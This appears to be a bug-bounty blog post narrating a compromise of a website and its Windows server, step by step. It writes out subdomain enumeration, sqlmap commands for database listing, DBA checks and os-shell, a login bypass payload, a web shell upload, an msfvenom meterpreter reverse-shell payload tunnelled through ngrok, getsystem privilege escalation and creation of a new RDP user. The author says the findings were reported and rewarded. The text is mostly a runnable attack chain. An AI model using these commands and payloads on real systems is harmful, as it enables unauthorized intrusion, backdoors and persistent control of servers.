Got Access To Server through SQL Injection.

Hi, how are you guys?, I hope you are fine. This is my first article of the month, I hope you enjoy it.

All of this started when my friend wanted to learn through the website and I thought “hmm, interesting, let start this one”.
First enumerated subdomains using amass and subfinder and with help of tools made by tomnomnom, namely anew.

amass enum -d site.com -passive | anew subs.txt && subfinder -d site.com -silent | anew subs.txt

After that, I used httpx to filter active domains. With the following command

cat subs.txt | httpx -mc 200 -o 200-subs.txt

Since there were only a few active domains, I opened each one in the browser one by one, and I came across a login page like this.

I tried entering ‘ and it displayed an error message.

I immediately used SQLmap to perform injection. With the following command

sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — dbs

After waiting for a while, I obtained several databases

Then i tried to see if my user is root or not, with the following command

sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — is-dba

Yes, I obtained the root user. I then tried using the following command

sqlmap -u “https://www.site.com/login” — data=”username=a&password=b” — random-agent — tamper=space2comment — level 3 — risk 3 — os-shell

Unfortunately, I didn’t get a backconnect. I really wanted to dump the data, but it wasn’t allowed.

Back to form login, I tried bypassing it by using (’=’’or’) and unexpectedly, I managed to log in. I quickly proceeded to upload a shell, and it was successful. However, all the directories appeared in red color.

I wondered in my mind, “Can I obtain the administrator user?” I tried using Metasploit and Ngrok for backconnect.

Open terminal and start ngrok with command

ngrok tcp 1337

Then, I created a payload for backconnect because this website uses a Windows server. I created it using the following command

msfvenom -p windows/meterpreter/reverse_tcp lhost=*without tcp://* lport=*Enter the port* -f exe -o back.exe

After that, I ran Metasploit and used the following command

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 1337 ( If you are using a different port, then use the port you specified when setting up “ngrok tcp port” )

exploit

After everything is running, it’s time to upload the previously created payload using the backdoor shell. Then, I use the “command” feature available in the backdoor shell to execute the payload I created by typing its name.

back.exe

Back to metasploit, I successfully obtained a backconnect.

I used the “shell” command to gain access to the command prompt (CMD), and then I checked my user.

nt authority\*not_administrator*

Back to meterpreter with command “exit” and i ran

getsystem

getuid

And boom, i got Administrators user

After that, I created a new user and accessed RDP (Remote Desktop Protocol) to report that I successfully gained access to the server.

I immediately reported my findings, and as a result of the bugs I discovered, I received several acknowledgments and rewards since they encompassed multiple websites.

Maybe that’s all from me, hopefully it can be a reference for you. I’m RyuuKhagetsu, see you in next article.